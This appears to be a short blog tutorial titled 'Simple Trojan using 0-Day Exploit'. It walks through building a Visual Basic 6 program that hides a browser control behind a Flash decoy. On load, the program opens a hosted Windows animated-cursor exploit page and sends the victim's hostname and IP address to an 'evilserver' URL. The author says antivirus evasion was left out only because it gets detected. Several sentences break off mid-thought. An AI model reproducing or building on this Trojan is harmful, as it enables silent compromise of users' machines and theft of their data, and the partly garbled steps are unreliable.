Simple Trojan using 0-Day Exploit:
Greetz: Edu, Str0ke…DarkPontifex, Euan
I am using “Windows Animated Cursor Handling Exploit (0day) (Version3) by jamikazu” to demonstrate this Example.
Technical Details:
Tested on:
Windows Vista Enterprise Version 6.0 (Build 6000) (default installation and UAC enabled)
Windows Vista Ultimate Version 6.0 (Build 6000) (default installation and UAC enabled)
Windows XP SP2
So I installed IE7 Beta3 on my Pc. Start VisualBasic6.0
With Standard EXE project.
Then add Ieframe.dll, you will get an error that “File Not Found”. This is because IE7 replaces Ieframe.dll controls. Let me explain you what is IEframe.dll
Ieframe.dll is a simple VB-browser or browser control
We can use this as wb1.navigate (http://www.google.co.in/)
Ieframe.dll comes with vb6.0 but after installing IE7, ieframe.dll become useless because
Browse Shdocvw.dll After adding it points Microsoft internet controls. Then press Apply
Also add Mswinsck.ocx ,flash9b.dll
Drag browser control (shdocvw.dll) to from toolbox along with flash9b.dll, mswinsck.ock
Then Drag flash ocx and add your favorite swf to it. Then drag shdocvw.dll but make
Sure that the size is smaller as shown in the figure. Because our idea is to execute the
It doesn’t have DEP at all. As we include components with this application.
The reason why I dint added processes hiding code is, easily detected by AV’s
Add the following code
Private Sub Form_Load()
Dim hsname As String
Dim ipaddr As String
hsname = winsck.LocalHostName
ipaddr = winsck.LocalIP
Wb.Navigate ("http://jamikazu.110mb.com/ani_exploit4/ani_exp4.htm")
Wb.Navigate2 ("http://evilserver/hsname ipaddr")
End Sub
Wb is the browser control and Wb.Navigate loads the exploit.
Wb.naviagate2 sends victim’s ip and host name to attacker
[Source: ]
Post a Comment